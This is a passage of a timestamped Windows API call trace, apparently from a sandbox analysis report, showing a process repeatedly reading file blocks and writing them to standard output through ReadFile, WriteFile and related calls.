[0092.741] GetFileType (hFile=0x4c) returned 0x1 [0092.741] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.741] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.741] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.741] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.741] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, 
lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] GetFileType (hFile=0x4c) returned 0x1 [0092.742] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.742] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.743] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.743] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] GetFileType (hFile=0x4c) returned 0x1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] GetFileType (hFile=0x4c) returned 0x1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] GetFileType (hFile=0x4c) returned 0x1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.743] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.743] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 
0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.744] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) 
returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.745] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.746] ReadFile 
(in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.747] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, 
lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.748] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.749] _get_osfhandle 
